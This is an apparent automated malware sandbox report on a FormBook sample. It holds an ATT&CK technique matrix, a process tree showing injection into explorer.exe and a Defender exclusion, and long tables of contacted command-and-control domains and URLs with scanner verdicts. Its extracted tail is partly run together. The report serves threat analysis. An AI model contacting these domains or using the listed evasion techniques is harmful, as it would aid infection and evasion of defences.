Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 612 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Credential API Hooking | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 225 System Information Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Software Packing | LSA Secrets | 241 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Rootkit | DCSync | 41 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Masquerading | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 41 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 612 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 1549204 | Sample: TEKL#U0130F #U0130ST.exe | Startdate: 05/11/2024 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: www.refabricated-homes-74404.bond; www.oko.events; 4 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
  started: TEKL#U0130F #U0130ST.exe 4
    Created file (dropped): C:\Users\...\TEKL#U0130F #U0130ST.exe.log, ASCII
    Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
    started: TEKL#U0130F #U0130ST.exe
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
      injected: explorer.exe 40 1
        DNS/IP: www.oko.events 185.26.122.70, 49784, 80 HOSTLANDRU Russian Federation
        Signatures: System process connects to network (likely due to code injection or exploit)
        started: mstsc.exe
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
          started: cmd.exe 1
            started: conhost.exe
    started: powershell.exe 23
      Signatures: Loading BitLocker PowerShell Module
      started: WmiPrvSE.exe
      started: conhost.exe

Source | Detection | Scanner | Label | Link
TEKL#U0130F #U0130ST.exe | 34% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
TEKL#U0130F #U0130ST.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.eals.latReferer: | 0% | Avira URL Cloud | safe |
http://www.52cy67sk.bondReferer: | 0% | Avira URL Cloud | safe |
http://www.obs-for-seniors-39582.bond/bc01/www.oko.events | 0% | Avira URL Cloud | safe |
http://www.oko.events/bc01/ | 0% | Avira URL Cloud | safe |
http://www.aming-chair-83359.bond/bc01/www.refabricated-homes-74404.bond | 0% | Avira URL Cloud | safe |
http://www.52cy67sk.bond | 0% | Avira URL Cloud | safe |
http://www.ajabandot.website | 0% | Avira URL Cloud | safe |
http://www.ewferg.top/bc01/ | 100% | Avira URL Cloud | malware |
http://www.irmag.online | 0% | Avira URL Cloud | safe |
http://www.obs-for-seniors-39582.bond | 0% | Avira URL Cloud | safe |
http://www.oko.events/bc01/www.aming-chair-83359.bond | 0% | Avira URL Cloud | safe |
http://www.eals.lat/bc01/www.ajabandot.website | 0% | Avira URL Cloud | safe |
http://www.2ar1.shop | 0% | Avira URL Cloud | safe |
http://www.olocaustaffirmer.netReferer: | 0% | Avira URL Cloud | safe |
http://www.y-language-menu.netReferer: | 0% | Avira URL Cloud | safe |
http://www.lkjuy.xyzReferer: | 0% | Avira URL Cloud | safe |
http://www.ewferg.top/bc01/www.52cy67sk.bond | 100% | Avira URL Cloud | malware |
http://www.lkjuy.xyz | 0% | Avira URL Cloud | safe |
http://www.y-language-menu.net/bc01/www.avada-casino-tlj.buzz | 0% | Avira URL Cloud | safe |
http://www.ewferg.topReferer: | 0% | Avira URL Cloud | safe |
http://www.irmag.onlineReferer: | 0% | Avira URL Cloud | safe |
http://www.olocaustaffirmer.net | 0% | Avira URL Cloud | safe |
http://www.2ar1.shop/bc01/www.obs-for-seniors-39582.bond | 0% | Avira URL Cloud | safe |
http://www.nline-degree-6987776.world/bc01/www.ntercash24-cad.homes | 0% | Avira URL Cloud | safe |
http://www.refabricated-homes-74404.bond | 0% | Avira URL Cloud | safe |
http://www.ntercash24-cad.homes/bc01/ | 0% | Avira URL Cloud | safe |
http://www.eals.lat | 0% | Avira URL Cloud | safe |
http://www.nline-degree-6987776.world | 0% | Avira URL Cloud | safe |
http://www.irmag.online/bc01/ | 0% | Avira URL Cloud | safe |
http://www.refabricated-homes-74404.bondReferer: | 0% | Avira URL Cloud | safe |
http://www.avada-casino-tlj.buzz/bc01/www.olocaustaffirmer.net | 0% | Avira URL Cloud | safe |
http://www.ajabandot.websiteReferer: | 0% | Avira URL Cloud | safe |
http://www.lkjuy.xyz/bc01/www.ewferg.top | 0% | Avira URL Cloud | safe |
http://www.aming-chair-83359.bond | 0% | Avira URL Cloud | safe |
http://www.lkjuy.xyz/bc01/ | 0% | Avira URL Cloud | safe |
http://www.avada-casino-tlj.buzz/bc01/ | 0% | Avira URL Cloud | safe |
http://www.refabricated-homes-74404.bond/bc01/ | 0% | Avira URL Cloud | safe |
https://java.B | 0% | Avira URL Cloud | safe |
www.avada-casino-tlj.buzz/bc01/ | 0% | Avira URL Cloud | safe |
http://www.irmag.online/bc01/www.eals.lat | 0% | Avira URL Cloud | safe |
http://www.ntercash24-cad.homes/bc01/www.irmag.online | 0% | Avira URL Cloud | safe |
http://www.obs-for-seniors-39582.bond/bc01/ | 0% | Avira URL Cloud | safe |
http://www.aming-chair-83359.bond/bc01/ | 0% | Avira URL Cloud | safe |
http://www.ntercash24-cad.homes | 0% | Avira URL Cloud | safe |
http://www.2ar1.shop/bc01/ | 0% | Avira URL Cloud | safe |
http://www.y-language-menu.net/bc01/ | 0% | Avira URL Cloud | safe |
http://www.olocaustaffirmer.net/bc01/ | 0% | Avira URL Cloud | safe |
http://www.nline-degree-6987776.world/bc01/ | 0% | Avira URL Cloud | safe |
http://www.nline-degree-6987776.worldReferer: | 0% | Avira URL Cloud | safe |
http://www.ntercash24-cad.homesReferer: | 0% | Avira URL Cloud | safe |
http://www.refabricated-homes-74404.bond/bc01/www.nline-degree-6987776.world | 0% | Avira URL Cloud | safe |
http://www.52cy67sk.bond/bc01/MMfl | 0% | Avira URL Cloud | safe |
http://www.ewferg.top | 100% | Avira URL Cloud | malware |
http://www.olocaustaffirmer.net/bc01/www.lkjuy.xyz | 0% | Avira URL Cloud | safe |
http://www.ajabandot.website/bc01/www.y-language-menu.net | 0% | Avira URL Cloud | safe |
http://www.avada-casino-tlj.buzzReferer: | 0% | Avira URL Cloud | safe |
http://www.52cy67sk.bond/bc01/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.oko.events | 185.26.122.70 | true | true | | unknown
www.2ar1.shop | unknown | unknown | true | | unknown
www.refabricated-homes-74404.bond | unknown | unknown | true | | unknown
www.aming-chair-83359.bond | unknown | unknown | true | | unknown
www.nline-degree-6987776.world | unknown | unknown | true | | unknown
www.obs-for-seniors-39582.bond | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
www.avada-casino-tlj.buzz/bc01/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://powerpoint.office.comer | explorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.oko.eventsReferer: | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.aming-chair-83359.bond/bc01/www.refabricated-homes-74404.bond | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOSA4 | explorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.obs-for-seniors-39582.bond/bc01/www.oko.events | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://tempuri.org/DataSet1.xsd | TEKL#U0130F #U0130ST.exe | false | | high
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.eals.latReferer: | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1 | explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.ewferg.top/bc01/ | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.ajabandot.website | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oko.events/bc01/ | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.obs-for-seniors-39582.bond | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.52cy67sk.bond | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.irmag.online | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.52cy67sk.bondReferer: | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal | explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.eals.lat/bc01/www.ajabandot.website | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oko.events/bc01/www.aming-chair-83359.bond | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.olocaustaffirmer.netReferer: | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.y-language-menu.netReferer: | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.c | explorer.exe, 00000006.00000000.1569063480.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.0000000009237000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.2ar1.shop | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | TEKL#U0130F #U0130ST.exe, 00000000.00000002.1552438954.000000000338B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://android.notify.windows.com/iOSd | explorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.lkjuy.xyzReferer: | explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.ewferg.top/bc01/www.52cy67sk.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.lkjuy.xyzexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.y-language-menu.net/bc01/www.avada-casino-tlj.buzzexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.olocaustaffirmer.netexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.ewferg.topReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.refabricated-homes-74404.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://outlook.comexplorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.irmag.onlineReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.nline-degree-6987776.world/bc01/www.ntercash24-cad.homesexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.2ar1.shop/bc01/www.obs-for-seniors-39582.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.nline-degree-6987776.worldexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.ntercash24-cad.homes/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.eals.latexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.lkjuy.xyz/bc01/www.ewferg.topexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.refabricated-homes-74404.bondReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.irmag.online/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.aming-chair-83359.bondexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.avada-casino-tlj.buzz/bc01/www.olocaustaffirmer.netexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000006.00000002.2817331144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.ajabandot.websiteReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.avada-casino-tlj.buzz/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.lkjuy.xyz/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.refabricated-homes-74404.bond/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://java.Bexplorer.exe, 00000006.00000002.2823132896.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2286118045.000000000C12C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1584952319.000000000C12D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.microexplorer.exe, 00000006.00000002.2814156946.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2807627861.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1565613332.0000000007720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.aming-chair-83359.bond/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.ntercash24-cad.homes/bc01/www.irmag.onlineexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://wns.windows.com/EM0explorer.exe, 00000006.00000000.1583309348.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.ntercash24-cad.homesexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.irmag.online/bc01/www.eals.latexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.oko.eventsexplorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.obs-for-seniors-39582.bond/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.2ar1.shop/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.nline-degree-6987776.world/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.olocaustaffirmer.net/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.y-language-menu.net/bc01/explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.nline-degree-6987776.worldReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.ntercash24-cad.homesReferer:explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
